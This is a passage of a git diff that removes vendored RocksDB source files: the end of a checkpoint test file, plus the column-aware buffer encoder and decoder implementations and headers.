-  options.max_manifest_file_size = 0;  // always rollover manifest for file add
-  Reopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {// Get past the flush in the checkpoint thread before adding any keys to
-       // the db so the checkpoint thread won't hit the WriteManifest
-       // syncpoints.
-       {"DBImpl::GetLiveFiles:1",
-        "CheckpointTest::CurrentFileModifiedWhileCheckpointing:PrePut"},
-       // Roll the manifest during checkpointing right after live files are
-       // snapshotted.
-       {"CheckpointImpl::CreateCheckpoint:SavedLiveFiles1",
-        "VersionSet::LogAndApply:WriteManifest"},
-       {"VersionSet::LogAndApply:WriteManifestDone",
-        "CheckpointImpl::CreateCheckpoint:SavedLiveFiles2"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread t([&]() {
-    Checkpoint* checkpoint;
-    ASSERT_OK(Checkpoint::Create(db_, &checkpoint));
-    ASSERT_OK(checkpoint->CreateCheckpoint(kSnapshotName));
-    delete checkpoint;
-  });
-  TEST_SYNC_POINT(
-      "CheckpointTest::CurrentFileModifiedWhileCheckpointing:PrePut");
-  ASSERT_OK(Put("Default", "Default1"));
-  ASSERT_OK(Flush());
-  t.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  DB* snapshotDB;
-  // Successful Open() implies that CURRENT pointed to the manifest in the
-  // checkpoint.
-  ASSERT_OK(DB::Open(options, kSnapshotName, &snapshotDB));
-  delete snapshotDB;
-  snapshotDB = nullptr;
-}
-
-TEST_F(CheckpointTest, CurrentFileModifiedWhileCheckpointing2PC) {
-  Close();
-  const std::string kSnapshotName = test::TmpDir(env_) + "/snapshot";
-  const std::string dbname = test::TmpDir() + "/transaction_testdb";
-  ASSERT_OK(DestroyDB(kSnapshotName, CurrentOptions()));
-  ASSERT_OK(DestroyDB(dbname, CurrentOptions()));
-  env_->DeleteDir(kSnapshotName);
-  env_->DeleteDir(dbname);
-
-  Options options = CurrentOptions();
-  options.allow_2pc = true;
-  // allow_2pc is implicitly set with tx prepare
-  // options.allow_2pc = true;
-  TransactionDBOptions txn_db_options;
-  TransactionDB* txdb;
-  Status s = TransactionDB::Open(options, txn_db_options, dbname, &txdb);
-  assert(s.ok());
-  ColumnFamilyHandle* cfa;
-  ColumnFamilyHandle* cfb;
-  ColumnFamilyOptions cf_options;
-  ASSERT_OK(txdb->CreateColumnFamily(cf_options, "CFA", &cfa));
-
-  WriteOptions write_options;
-  // Insert something into CFB so lots of log files will be kept
-  // before creating the checkpoint.
-  ASSERT_OK(txdb->CreateColumnFamily(cf_options, "CFB", &cfb));
-  ASSERT_OK(txdb->Put(write_options, cfb, "", ""));
-
-  ReadOptions read_options;
-  std::string value;
-  TransactionOptions txn_options;
-  Transaction* txn = txdb->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("xid");
-  ASSERT_OK(s);
-  ASSERT_EQ(txdb->GetTransactionByName("xid"), txn);
-
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  s = txn->Put(cfa, Slice("foocfa"), Slice("barcfa"));
-  ASSERT_OK(s);
-  // Writing prepare into middle of first WAL, then flush WALs many times
-  for (int i = 1; i <= 100000; i++) {
-    Transaction* tx = txdb->BeginTransaction(write_options, txn_options);
-    ASSERT_OK(tx->SetName("x"));
-    ASSERT_OK(tx->Put(Slice(std::to_string(i)), Slice("val")));
-    ASSERT_OK(tx->Put(cfa, Slice("aaa"), Slice("111")));
-    ASSERT_OK(tx->Prepare());
-    ASSERT_OK(tx->Commit());
-    if (i % 10000 == 0) {
-      txdb->Flush(FlushOptions());
-    }
-    if (i == 88888) {
-      ASSERT_OK(txn->Prepare());
-    }
-    delete tx;
-  }
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"CheckpointImpl::CreateCheckpoint:SavedLiveFiles1",
-        "CheckpointTest::CurrentFileModifiedWhileCheckpointing2PC:PreCommit"},
-       {"CheckpointTest::CurrentFileModifiedWhileCheckpointing2PC:PostCommit",
-        "CheckpointImpl::CreateCheckpoint:SavedLiveFiles2"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread t([&]() {
-    Checkpoint* checkpoint;
-    ASSERT_OK(Checkpoint::Create(txdb, &checkpoint));
-    ASSERT_OK(checkpoint->CreateCheckpoint(kSnapshotName));
-    delete checkpoint;
-  });
-  TEST_SYNC_POINT(
-      "CheckpointTest::CurrentFileModifiedWhileCheckpointing2PC:PreCommit");
-  ASSERT_OK(txn->Commit());
-  delete txn;
-  TEST_SYNC_POINT(
-      "CheckpointTest::CurrentFileModifiedWhileCheckpointing2PC:PostCommit");
-  t.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  // No more than two logs files should exist.
-  std::vector<std::string> files;
-  env_->GetChildren(kSnapshotName, &files);
-  int num_log_files = 0;
-  for (auto& file : files) {
-    uint64_t num;
-    FileType type;
-    WalFileType log_type;
-    if (ParseFileName(file, &num, &type, &log_type) && type == kLogFile) {
-      num_log_files++;
-    }
-  }
-  // One flush after preapare + one outstanding file before checkpoint + one log
-  // file generated after checkpoint.
-  ASSERT_LE(num_log_files, 3);
-
-  TransactionDB* snapshotDB;
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, ColumnFamilyOptions()));
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFA", ColumnFamilyOptions()));
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFB", ColumnFamilyOptions()));
-  std::vector<rocksdb::ColumnFamilyHandle*> cf_handles;
-  ASSERT_OK(TransactionDB::Open(options, txn_db_options, kSnapshotName,
-                                column_families, &cf_handles, &snapshotDB));
-  ASSERT_OK(snapshotDB->Get(read_options, "foo", &value));
-  ASSERT_EQ(value, "bar");
-  ASSERT_OK(snapshotDB->Get(read_options, cf_handles[1], "foocfa", &value));
-  ASSERT_EQ(value, "barcfa");
-
-  delete cfa;
-  delete cfb;
-  delete cf_handles[0];
-  delete cf_handles[1];
-  delete cf_handles[2];
-  delete snapshotDB;
-  snapshotDB = nullptr;
-  delete txdb;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as Checkpoint is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/col_buf_decoder.cc b/thirdparty/rocksdb/utilities/col_buf_decoder.cc
deleted file mode 100644
index 3fb3179..0000000
--- a/thirdparty/rocksdb/utilities/col_buf_decoder.cc
+++ /dev/null
@@ -1,240 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "utilities/col_buf_decoder.h"
-#include <cstring>
-#include <string>
-#include "port/port.h"
-
-namespace rocksdb {
-
-ColBufDecoder::~ColBufDecoder() {}
-
-namespace {
-
-inline uint64_t EncodeFixed64WithEndian(uint64_t val, bool big_endian,
-                                        size_t size) {
-  if (big_endian && port::kLittleEndian) {
-    val = EndianTransform(val, size);
-  } else if (!big_endian && !port::kLittleEndian) {
-    val = EndianTransform(val, size);
-  }
-  return val;
-}
-
-}  // namespace
-
-ColBufDecoder* ColBufDecoder::NewColBufDecoder(
-    const ColDeclaration& col_declaration) {
-  if (col_declaration.col_type == "FixedLength") {
-    return new FixedLengthColBufDecoder(
-        col_declaration.size, col_declaration.col_compression_type,
-        col_declaration.nullable, col_declaration.big_endian);
-  } else if (col_declaration.col_type == "VariableLength") {
-    return new VariableLengthColBufDecoder();
-  } else if (col_declaration.col_type == "VariableChunk") {
-    return new VariableChunkColBufDecoder(col_declaration.col_compression_type);
-  } else if (col_declaration.col_type == "LongFixedLength") {
-    return new LongFixedLengthColBufDecoder(col_declaration.size,
-                                            col_declaration.nullable);
-  }
-  // Unrecognized column type
-  return nullptr;
-}
-
-namespace {
-
-void ReadVarint64(const char** src_ptr, uint64_t* val_ptr) {
-  const char* q = GetVarint64Ptr(*src_ptr, *src_ptr + 10, val_ptr);
-  assert(q != nullptr);
-  *src_ptr = q;
-}
-}  // namespace
-
-size_t FixedLengthColBufDecoder::Init(const char* src) {
-  remain_runs_ = 0;
-  last_val_ = 0;
-  // Dictionary initialization
-  dict_vec_.clear();
-  const char* orig_src = src;
-  if (col_compression_type_ == kColDict ||
-      col_compression_type_ == kColRleDict) {
-    const char* q;
-    uint64_t dict_size;
-    // Bypass limit
-    q = GetVarint64Ptr(src, src + 10, &dict_size);
-    assert(q != nullptr);
-    src = q;
-
-    uint64_t dict_key;
-    for (uint64_t i = 0; i < dict_size; ++i) {
-      // Bypass limit
-      ReadVarint64(&src, &dict_key);
-
-      dict_key = EncodeFixed64WithEndian(dict_key, big_endian_, size_);
-      dict_vec_.push_back(dict_key);
-    }
-  }
-  return src - orig_src;
-}
-
-size_t FixedLengthColBufDecoder::Decode(const char* src, char** dest) {
-  uint64_t read_val = 0;
-  const char* orig_src = src;
-  const char* src_limit = src + 20;
-  if (nullable_) {
-    bool not_null;
-    not_null = *src;
-    src += 1;
-    if (!not_null) {
-      return 1;
-    }
-  }
-  if (IsRunLength(col_compression_type_)) {
-    if (remain_runs_ == 0) {
-      const char* q;
-      run_val_ = 0;
-      if (col_compression_type_ == kColRle) {
-        memcpy(&run_val_, src, size_);
-        src += size_;
-      } else {
-        q = GetVarint64Ptr(src, src_limit, &run_val_);
-        assert(q != nullptr);
-        src = q;
-      }
-
-      q = GetVarint64Ptr(src, src_limit, &remain_runs_);
-      assert(q != nullptr);
-      src = q;
-
-      if (col_compression_type_ != kColRleDeltaVarint &&
-          col_compression_type_ != kColRleDict) {
-        run_val_ = EncodeFixed64WithEndian(run_val_, big_endian_, size_);
-      }
-    }
-    read_val = run_val_;
-  } else {
-    if (col_compression_type_ == kColNoCompression) {
-      memcpy(&read_val, src, size_);
-      src += size_;
-    } else {
-      // Assume a column does not exceed 8 bytes here
-      const char* q = GetVarint64Ptr(src, src_limit, &read_val);
-      assert(q != nullptr);
-      src = q;
-    }
-    if (col_compression_type_ != kColDeltaVarint &&
-        col_compression_type_ != kColDict) {
-      read_val = EncodeFixed64WithEndian(read_val, big_endian_, size_);
-    }
-  }
-
-  uint64_t write_val = read_val;
-  if (col_compression_type_ == kColDeltaVarint ||
-      col_compression_type_ == kColRleDeltaVarint) {
-    // does not support 64 bit
-
-    uint64_t mask = (write_val & 1) ? (~uint64_t(0)) : 0;
-    int64_t delta = (write_val >> 1) ^ mask;
-    write_val = last_val_ + delta;
-
-    uint64_t tmp = write_val;
-    write_val = EncodeFixed64WithEndian(write_val, big_endian_, size_);
-    last_val_ = tmp;
-  } else if (col_compression_type_ == kColRleDict ||
-             col_compression_type_ == kColDict) {
-    uint64_t dict_val = read_val;
-    assert(dict_val < dict_vec_.size());
-    write_val = dict_vec_[dict_val];
-  }
-
-  // dest->append(reinterpret_cast<char*>(&write_val), size_);
-  memcpy(*dest, reinterpret_cast<char*>(&write_val), size_);
-  *dest += size_;
-  if (IsRunLength(col_compression_type_)) {
-    --remain_runs_;
-  }
-  return src - orig_src;
-}
-
-size_t LongFixedLengthColBufDecoder::Decode(const char* src, char** dest) {
-  if (nullable_) {
-    bool not_null;
-    not_null = *src;
-    src += 1;
-    if (!not_null) {
-      return 1;
-    }
-  }
-  memcpy(*dest, src, size_);
-  *dest += size_;
-  return size_ + 1;
-}
-
-size_t VariableLengthColBufDecoder::Decode(const char* src, char** dest) {
-  uint8_t len;
-  len = *src;
-  memcpy(dest, reinterpret_cast<char*>(&len), 1);
-  *dest += 1;
-  src += 1;
-  memcpy(*dest, src, len);
-  *dest += len;
-  return len + 1;
-}
-
-size_t VariableChunkColBufDecoder::Init(const char* src) {
-  // Dictionary initialization
-  dict_vec_.clear();
-  const char* orig_src = src;
-  if (col_compression_type_ == kColDict) {
-    const char* q;
-    uint64_t dict_size;
-    // Bypass limit
-    q = GetVarint64Ptr(src, src + 10, &dict_size);
-    assert(q != nullptr);
-    src = q;
-
-    uint64_t dict_key;
-    for (uint64_t i = 0; i < dict_size; ++i) {
-      // Bypass limit
-      ReadVarint64(&src, &dict_key);
-      dict_vec_.push_back(dict_key);
-    }
-  }
-  return src - orig_src;
-}
-
-size_t VariableChunkColBufDecoder::Decode(const char* src, char** dest) {
-  const char* orig_src = src;
-  uint64_t size = 0;
-  ReadVarint64(&src, &size);
-  int64_t full_chunks = size / 8;
-  uint64_t chunk_buf;
-  size_t chunk_size = 8;
-  for (int64_t i = 0; i < full_chunks + 1; ++i) {
-    chunk_buf = 0;
-    if (i == full_chunks) {
-      chunk_size = size % 8;
-    }
-    if (col_compression_type_ == kColDict) {
-      uint64_t dict_val;
-      ReadVarint64(&src, &dict_val);
-      assert(dict_val < dict_vec_.size());
-      chunk_buf = dict_vec_[dict_val];
-    } else {
-      memcpy(&chunk_buf, src, chunk_size);
-      src += chunk_size;
-    }
-    memcpy(*dest, reinterpret_cast<char*>(&chunk_buf), 8);
-    *dest += 8;
-    uint8_t mask = ((0xFF - 8) + chunk_size) & 0xFF;
-    memcpy(*dest, reinterpret_cast<char*>(&mask), 1);
-    *dest += 1;
-  }
-
-  return src - orig_src;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/col_buf_decoder.h b/thirdparty/rocksdb/utilities/col_buf_decoder.h
deleted file mode 100644
index e795e4e..0000000
--- a/thirdparty/rocksdb/utilities/col_buf_decoder.h
+++ /dev/null
@@ -1,116 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <cstdio>
-#include <cstring>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "util/coding.h"
-#include "utilities/col_buf_encoder.h"
-
-namespace rocksdb {
-
-struct ColDeclaration;
-
-// ColBufDecoder is a class to decode column buffers. It can be populated from a
-// ColDeclaration. Before starting decoding, a Init() method should be called.
-// Each time it takes a column value into Decode() method.
-class ColBufDecoder {
- public:
-  virtual ~ColBufDecoder() = 0;
-  virtual size_t Init(const char* src) { return 0; }
-  virtual size_t Decode(const char* src, char** dest) = 0;
-  static ColBufDecoder* NewColBufDecoder(const ColDeclaration& col_declaration);
-
- protected:
-  std::string buffer_;
-  static inline bool IsRunLength(ColCompressionType type) {
-    return type == kColRle || type == kColRleVarint ||
-           type == kColRleDeltaVarint || type == kColRleDict;
-  }
-};
-
-class FixedLengthColBufDecoder : public ColBufDecoder {
- public:
-  explicit FixedLengthColBufDecoder(
-      size_t size, ColCompressionType col_compression_type = kColNoCompression,
-      bool nullable = false, bool big_endian = false)
-      : size_(size),
-        col_compression_type_(col_compression_type),
-        nullable_(nullable),
-        big_endian_(big_endian) {}
-
-  size_t Init(const char* src) override;
-  size_t Decode(const char* src, char** dest) override;
-  ~FixedLengthColBufDecoder() {}
-
- private:
-  size_t size_;
-  ColCompressionType col_compression_type_;
-  bool nullable_;
-  bool big_endian_;
-
-  // for decoding
-  std::vector<uint64_t> dict_vec_;
-  uint64_t remain_runs_;
-  uint64_t run_val_;
-  uint64_t last_val_;
-};
-
-class LongFixedLengthColBufDecoder : public ColBufDecoder {
- public:
-  LongFixedLengthColBufDecoder(size_t size, bool nullable)
-      : size_(size), nullable_(nullable) {}
-
-  size_t Decode(const char* src, char** dest) override;
-  ~LongFixedLengthColBufDecoder() {}
-
- private:
-  size_t size_;
-  bool nullable_;
-};
-
-class VariableLengthColBufDecoder : public ColBufDecoder {
- public:
-  size_t Decode(const char* src, char** dest) override;
-  ~VariableLengthColBufDecoder() {}
-};
-
-class VariableChunkColBufDecoder : public VariableLengthColBufDecoder {
- public:
-  size_t Init(const char* src) override;
-  size_t Decode(const char* src, char** dest) override;
-  explicit VariableChunkColBufDecoder(ColCompressionType col_compression_type)
-      : col_compression_type_(col_compression_type) {}
-  VariableChunkColBufDecoder() : col_compression_type_(kColNoCompression) {}
-
- private:
-  ColCompressionType col_compression_type_;
-  std::unordered_map<uint64_t, uint64_t> dictionary_;
-  std::vector<uint64_t> dict_vec_;
-};
-
-struct KVPairColBufDecoders {
-  std::vector<std::unique_ptr<ColBufDecoder>> key_col_bufs;
-  std::vector<std::unique_ptr<ColBufDecoder>> value_col_bufs;
-  std::unique_ptr<ColBufDecoder> value_checksum_buf;
-
-  explicit KVPairColBufDecoders(const KVPairColDeclarations& kvp_cd) {
-    for (auto kcd : *kvp_cd.key_col_declarations) {
-      key_col_bufs.emplace_back(
-          std::move(ColBufDecoder::NewColBufDecoder(kcd)));
-    }
-    for (auto vcd : *kvp_cd.value_col_declarations) {
-      value_col_bufs.emplace_back(
-          std::move(ColBufDecoder::NewColBufDecoder(vcd)));
-    }
-    value_checksum_buf.reset(
-        ColBufDecoder::NewColBufDecoder(*kvp_cd.value_checksum_declaration));
-  }
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/col_buf_encoder.cc b/thirdparty/rocksdb/utilities/col_buf_encoder.cc
deleted file mode 100644
index feaf564..0000000
--- a/thirdparty/rocksdb/utilities/col_buf_encoder.cc
+++ /dev/null
@@ -1,217 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "utilities/col_buf_encoder.h"
-#include <cstring>
-#include <string>
-#include "port/port.h"
-
-namespace rocksdb {
-
-ColBufEncoder::~ColBufEncoder() {}
-
-namespace {
-
-inline uint64_t DecodeFixed64WithEndian(uint64_t val, bool big_endian,
-                                        size_t size) {
-  if (big_endian && port::kLittleEndian) {
-    val = EndianTransform(val, size);
-  } else if (!big_endian && !port::kLittleEndian) {
-    val = EndianTransform(val, size);
-  }
-  return val;
-}
-
-}  // namespace
-
-const std::string &ColBufEncoder::GetData() { return buffer_; }
-
-ColBufEncoder *ColBufEncoder::NewColBufEncoder(
-    const ColDeclaration &col_declaration) {
-  if (col_declaration.col_type == "FixedLength") {
-    return new FixedLengthColBufEncoder(
-        col_declaration.size, col_declaration.col_compression_type,
-        col_declaration.nullable, col_declaration.big_endian);
-  } else if (col_declaration.col_type == "VariableLength") {
-    return new VariableLengthColBufEncoder();
-  } else if (col_declaration.col_type == "VariableChunk") {
-    return new VariableChunkColBufEncoder(col_declaration.col_compression_type);
-  } else if (col_declaration.col_type == "LongFixedLength") {
-    return new LongFixedLengthColBufEncoder(col_declaration.size,
-                                            col_declaration.nullable);
-  }
-  // Unrecognized column type
-  return nullptr;
-}
-
-#ifdef ROCKSDB_UBSAN_RUN
-#if defined(__clang__)
-__attribute__((__no_sanitize__("shift")))
-#elif defined(__GNUC__)
-__attribute__((__no_sanitize_undefined__))
-#endif
-#endif
-size_t FixedLengthColBufEncoder::Append(const char *buf) {
-  if (nullable_) {
-    if (buf == nullptr) {
-      buffer_.append(1, 0);
-      return 0;
-    } else {
-      buffer_.append(1, 1);
-    }
-  }
-  uint64_t read_val = 0;
-  memcpy(&read_val, buf, size_);
-  read_val = DecodeFixed64WithEndian(read_val, big_endian_, size_);
-
-  // Determine write value
-  uint64_t write_val = read_val;
-  if (col_compression_type_ == kColDeltaVarint ||
-      col_compression_type_ == kColRleDeltaVarint) {
-    int64_t delta = read_val - last_val_;
-    // Encode signed delta value
-    delta = (delta << 1) ^ (delta >> 63);
-    write_val = delta;
-    last_val_ = read_val;
-  } else if (col_compression_type_ == kColDict ||
-             col_compression_type_ == kColRleDict) {
-    auto iter = dictionary_.find(read_val);
-    uint64_t dict_val;
-    if (iter == dictionary_.end()) {
-      // Add new entry to dictionary
-      dict_val = dictionary_.size();
-      dictionary_.insert(std::make_pair(read_val, dict_val));
-      dict_vec_.push_back(read_val);
-    } else {
-      dict_val = iter->second;
-    }
-    write_val = dict_val;
-  }
-
-  // Write into buffer
-  if (IsRunLength(col_compression_type_)) {
-    if (run_length_ == -1) {
-      // First element
-      run_val_ = write_val;
-      run_length_ = 1;
-    } else if (write_val != run_val_) {
-      // End of run
-      // Write run value
-      if (col_compression_type_ == kColRle) {
-        buffer_.append(reinterpret_cast<char *>(&run_val_), size_);
-      } else {
-        PutVarint64(&buffer_, run_val_);
-      }
-      // Write run length
-      PutVarint64(&buffer_, run_length_);
-      run_val_ = write_val;
-      run_length_ = 1;
-    } else {
-      run_length_++;
-    }
-  } else {  // non run-length encodings
-    if (col_compression_type_ == kColNoCompression) {
-      buffer_.append(reinterpret_cast<char *>(&write_val), size_);
-    } else {
-      PutVarint64(&buffer_, write_val);
-    }
-  }
-  return size_;
-}
-
-void FixedLengthColBufEncoder::Finish() {
-  if (col_compression_type_ == kColDict ||
-      col_compression_type_ == kColRleDict) {
-    std::string header;
-    PutVarint64(&header, dict_vec_.size());
-    // Put dictionary in the header
-    for (auto item : dict_vec_) {
-      PutVarint64(&header, item);
-    }
-    buffer_ = header + buffer_;
-  }
-  if (IsRunLength(col_compression_type_)) {
-    // Finish last run value
-    if (col_compression_type_ == kColRle) {
-      buffer_.append(reinterpret_cast<char *>(&run_val_), size_);
-    } else {
-      PutVarint64(&buffer_, run_val_);
-    }
-    PutVarint64(&buffer_, run_length_);
-  }
-}
-
-size_t LongFixedLengthColBufEncoder::Append(const char *buf) {
-  if (nullable_) {
-    if (buf == nullptr) {
-      buffer_.append(1, 0);
-      return 0;
-    } else {
-      buffer_.append(1, 1);
-    }
-  }
-  buffer_.append(buf, size_);
-  return size_;
-}
-
-void LongFixedLengthColBufEncoder::Finish() {}
-
-size_t VariableLengthColBufEncoder::Append(const char *buf) {
-  uint8_t length = 0;
-  length = *buf;
-  buffer_.append(buf, 1);
-  buf += 1;
-  buffer_.append(buf, length);
-  return length + 1;
-}
-
-void VariableLengthColBufEncoder::Finish() {}
-
-size_t VariableChunkColBufEncoder::Append(const char *buf) {
-  const char *orig_buf = buf;
-  uint8_t mark = 0xFF;
-  size_t length = 0;
-  std::string tmp_buffer;
-  while (mark == 0xFF) {
-    uint64_t val;
-    memcpy(&val, buf, 8);
-    buf += 8;
-    mark = *buf;
-    buf += 1;
-    int8_t chunk_size = 8 - (0xFF - mark);
-    if (col_compression_type_ == kColDict) {
-      auto iter = dictionary_.find(val);
-      uint64_t dict_val;
-      if (iter == dictionary_.end()) {
-        dict_val = dictionary_.size();
-        dictionary_.insert(std::make_pair(val, dict_val));
-        dict_vec_.push_back(val);
-      } else {
-        dict_val = iter->second;
-      }
-      PutVarint64(&tmp_buffer, dict_val);
-    } else {
-      tmp_buffer.append(reinterpret_cast<char *>(&val), chunk_size);
-    }
-    length += chunk_size;
-  }
-
-  PutVarint64(&buffer_, length);
-  buffer_.append(tmp_buffer);
-  return buf - orig_buf;
-}
-
-void VariableChunkColBufEncoder::Finish() {
-  if (col_compression_type_ == kColDict) {
-    std::string header;
-    PutVarint64(&header, dict_vec_.size());
-    for (auto item : dict_vec_) {
-      PutVarint64(&header, item);
-    }
-    buffer_ = header + buffer_;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/col_buf_encoder.h b/thirdparty/rocksdb/utilities/col_buf_encoder.h
deleted file mode 100644
index 9028799..0000000
--- a/thirdparty/rocksdb/utilities/col_buf_encoder.h
+++ /dev/null
@@ -1,219 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <cstdio>
-#include <cstring>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "util/coding.h"
-
-namespace rocksdb {
-
-enum ColCompressionType {
-  kColNoCompression,
-  kColRle,
-  kColVarint,
-  kColRleVarint,
-  kColDeltaVarint,
-  kColRleDeltaVarint,
-  kColDict,
-  kColRleDict
-};
-
-struct ColDeclaration;
-
-// ColBufEncoder is a class to encode column buffers. It can be populated from a
-// ColDeclaration. Each time it takes a column value into Append() method to
-// encode the column and store it into an internal buffer. After all rows for
-// this column are consumed, a Finish() should be called to add header and
-// remaining data.
-class ColBufEncoder {
- public:
-  // Read a column, encode data and append into internal buffer.
-  virtual size_t Append(const char *buf) = 0;
-  virtual ~ColBufEncoder() = 0;
-  // Get the internal column buffer. Should only be called after Finish().
-  const std::string &GetData();
-  // Finish encoding. Add header and remaining data.
-  virtual void Finish() = 0;
-  // Populate a ColBufEncoder from ColDeclaration.
-  static ColBufEncoder *NewColBufEncoder(const ColDeclaration &col_declaration);
-
- protected:
-  std::string buffer_;
-  static inline bool IsRunLength(ColCompressionType type) {
-    return type == kColRle || type == kColRleVarint ||
-           type == kColRleDeltaVarint || type == kColRleDict;
-  }
-};
-
-// Encoder for fixed length column buffer. In fixed length column buffer, the
-// size of the column should not exceed 8 bytes.
-// The following encodings are supported:
-// Varint: Variable length integer. See util/coding.h for more details
-// Rle (Run length encoding): encode a sequence of contiguous value as
-// [run_value][run_length]. Can be combined with Varint
-// Delta: Encode value to its delta with its adjacent entry. Use varint to
-// possibly reduce stored bytes. Can be combined with Rle.
-// Dictionary: Use a dictionary to record all possible values in the block and
-// encode them with an ID started from 0. IDs are encoded as varint. A column
-// with dictionary encoding will have a header to store all actual values,
-// ordered by their dictionary value, and the data will be replaced by
-// dictionary value. Can be combined with Rle.
-class FixedLengthColBufEncoder : public ColBufEncoder {
- public:
-  explicit FixedLengthColBufEncoder(
-      size_t size, ColCompressionType col_compression_type = kColNoCompression,
-      bool nullable = false, bool big_endian = false)
-      : size_(size),
-        col_compression_type_(col_compression_type),
-        nullable_(nullable),
-        big_endian_(big_endian),
-        last_val_(0),
-        run_length_(-1),
-        run_val_(0) {}
-
-  size_t Append(const char *buf) override;
-  void Finish() override;
-  ~FixedLengthColBufEncoder() {}
-
- private:
-  size_t size_;
-  ColCompressionType col_compression_type_;
-  // If set as true, the input value can be null (represented as nullptr). When
-  // nullable is true, use one more byte before actual value to indicate if the
-  // current value is null.
-  bool nullable_;
-  // If set as true, input value will be treated as big endian encoded.
-  bool big_endian_;
-
-  // for encoding
-  uint64_t last_val_;
-  int16_t run_length_;
-  uint64_t run_val_;
-  // Map to store dictionary for dictionary encoding
-  std::unordered_map<uint64_t, uint64_t> dictionary_;
-  // Vector of dictionary keys.
-  std::vector<uint64_t> dict_vec_;
-};
-
-// Long fixed length column buffer is a variant of fixed length buffer to hold
-// fixed length buffer with more than 8 bytes. We do not support any special
-// encoding schemes in LongFixedLengthColBufEncoder.
-class LongFixedLengthColBufEncoder : public ColBufEncoder {
- public:
-  LongFixedLengthColBufEncoder(size_t size, bool nullable)
-      : size_(size), nullable_(nullable) {}
-  size_t Append(const char *buf) override;
-  void Finish() override;
-
-  ~LongFixedLengthColBufEncoder() {}
-
- private:
-  size_t size_;
-  bool nullable_;
-};
-
-// Variable length column buffer holds a format of variable length column. In
-// this format, a column is composed of one byte length k, followed by data with
-// k bytes long data.
-class VariableLengthColBufEncoder : public ColBufEncoder {
- public:
-  size_t Append(const char *buf) override;
-  void Finish() override;
-
-  ~VariableLengthColBufEncoder() {}
-};
-
-// Variable chunk column buffer holds another format of variable length column.
-// In this format, a column contains multiple chunks of data, each of which is
-// composed of 8 bytes long data, and one byte as a mask to indicate whether we
-// have more data to come. If no more data coming, the mask is set as 0xFF. If
-// the chunk is the last chunk and has only k valid bytes, the mask is set as
-// 0xFF - (8 - k).
-class VariableChunkColBufEncoder : public VariableLengthColBufEncoder {
- public:
-  size_t Append(const char *buf) override;
-  void Finish() override;
-  explicit VariableChunkColBufEncoder(ColCompressionType col_compression_type)
-      : col_compression_type_(col_compression_type) {}
-  VariableChunkColBufEncoder() : col_compression_type_(kColNoCompression) {}
-
- private:
-  ColCompressionType col_compression_type_;
-  // Map to store dictionary for dictionary encoding
-  std::unordered_map<uint64_t, uint64_t> dictionary_;
-  // Vector of dictionary keys.
-  std::vector<uint64_t> dict_vec_;
-};
-
-// ColDeclaration declares a column's type, algorithm of column-aware encoding,
-// and other column data like endian and nullability.
-struct ColDeclaration {
-  explicit ColDeclaration(
-      std::string _col_type,
-      ColCompressionType _col_compression_type = kColNoCompression,
-      size_t _size = 0, bool _nullable = false, bool _big_endian = false)
-      : col_type(_col_type),
-        col_compression_type(_col_compression_type),
-        size(_size),
-        nullable(_nullable),
-        big_endian(_big_endian) {}
-  std::string col_type;
-  ColCompressionType col_compression_type;
-  size_t size;
-  bool nullable;
-  bool big_endian;
-};
-
-// KVPairColDeclarations is a class to hold column declaration of columns in
-// key and value.
-struct KVPairColDeclarations {
-  std::vector<ColDeclaration> *key_col_declarations;
-  std::vector<ColDeclaration> *value_col_declarations;
-  ColDeclaration *value_checksum_declaration;
-  KVPairColDeclarations(std::vector<ColDeclaration> *_key_col_declarations,
-                        std::vector<ColDeclaration> *_value_col_declarations,
-                        ColDeclaration *_value_checksum_declaration)
-      : key_col_declarations(_key_col_declarations),
-        value_col_declarations(_value_col_declarations),
-        value_checksum_declaration(_value_checksum_declaration) {}
-};
-
-// Similar to KVPairDeclarations, KVPairColBufEncoders is used to hold column
-// buffer encoders of all columns in key and value.
-struct KVPairColBufEncoders {
-  std::vector<std::unique_ptr<ColBufEncoder>> key_col_bufs;
-  std::vector<std::unique_ptr<ColBufEncoder>> value_col_bufs;
